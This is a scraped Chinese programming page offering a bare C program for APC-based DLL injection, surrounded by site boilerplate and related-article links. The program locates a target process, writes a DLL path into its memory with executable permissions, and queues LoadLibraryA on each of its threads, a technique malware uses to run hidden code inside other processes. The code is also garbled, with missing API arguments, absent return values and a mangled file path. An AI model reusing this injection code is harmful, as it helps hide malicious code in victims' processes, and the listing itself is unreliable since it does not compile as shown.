APC注入
发布时间:2020-12-14 01:37:46 所属栏目:Windows 来源:网络整理
导读:#include windows.h #include tlhelp32.h #include stdio.h DWORD GetProcessIdByName(char *pszProcessName) { HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); PROCESSENTRY32 ProcesEntry = {sizeof(ProcesEntry)}; BOOL bRet = Process
|
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
DWORD GetProcessIdByName(char *pszProcessName) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 ProcesEntry = {sizeof(ProcesEntry)};
BOOL bRet = Process32First(hSnap,&ProcesEntry);
while (bRet) {
if (strcmpi(ProcesEntry.szExeFile,pszProcessName) == 0) {
return ProcesEntry.th32ProcessID;
}
bRet = Process32Next(hSnap,&ProcesEntry);
}
}
BOOL GetAllThreadId(DWORD ProcessId,DWORD **ppThreadId,DWORD *LengthThread){
HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);
THREADENTRY32 ThreadEntry={sizeof(ThreadEntry)};
BOOL bRet=Thread32First(hSnap,&ThreadEntry);
DWORD *pThreadId =malloc(sizeof(DWORD)*1024);
int count=0;
while(bRet){
if(ThreadEntry.th32OwnerProcessID==ProcessId){
pThreadId[count]=ThreadEntry.th32ThreadID;
count++;
}
bRet=Thread32Next(hSnap,&ThreadEntry);
}
*ppThreadId=pThreadId;
*LengthThread=count;
}
BOOL DllInject(char *pszProcessName,char *pszDllName){
DWORD ProcessId=GetProcessIdByName(pszProcessName);
DWORD *pThreadId=NULL;
DWORD LengthThread=0;
GetAllThreadId(ProcessId,&pThreadId,&LengthThread);
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProcessId);
LPVOID lDllAdr=VirtualAllocEx(hProcess,NULL,strlen(pszDllName)+1,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess,lDllAdr,pszDllName,0);
FARPROC pLoadLibraryA=GetProcAddress(GetModuleHandleA("kernel32.dll"),"LoadLibraryA");
HANDLE hThread;
for(int i=0;i<LengthThread;i++){
hThread=OpenThread(THREAD_ALL_ACCESS,pThreadId[i]);
QueueUserAPC((PAPCFUNC)pLoadLibraryA,hThread,(ULONG_PTR) lDllAdr);
}
}
int main(){
DllInject("code.exe","C:UsersbeiniDesktopworktest.dll");
return 0;
}
(编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
相关内容
- windows – 如何阻止Perl程序在完成后关闭窗口?
- windows-server-2008 – 登录前最简单的启动应用程序的方法
- 读取注册表获取计算机上已安装程序的信息
- 将现有的DotNetNuke门户迁移到windows azure
- windows – Win32_LogonSessions返回旧会话
- Windows Phone 7相当于Android的WebView
- windows – 如何使用批处理文件获取文件的属性
- 方便的Windows相当于tail -f logfile?
- 像Microsoft Access(VBA)的通知一样非阻塞“吐司”
- 基于Windows Sdk 与visual C++2008 在微软平台上构架自己的
推荐文章
站长推荐
- 如何通知Windows服务(c#)的DB Table Change(sql
- Drools.NET与Windows Workflow Foundation(WF)
- Windows开发人员切换到Linux的资源
- windows – 如何监控硬盘是否处于待机状态?
- Windows 8 SDK重命名了所有标题,我不知道现在要包
- windows-server-2008 – 如何设置ExecutionPolic
- Windows上的奇怪Python错误,在调试器下工作
- 如何在Windows上将Bitbucket项目导入Github
- batch-file – 用于在windows命令中循环打印日期
- 在Windows上的Scala代码中运行shell命令似乎需要
热点阅读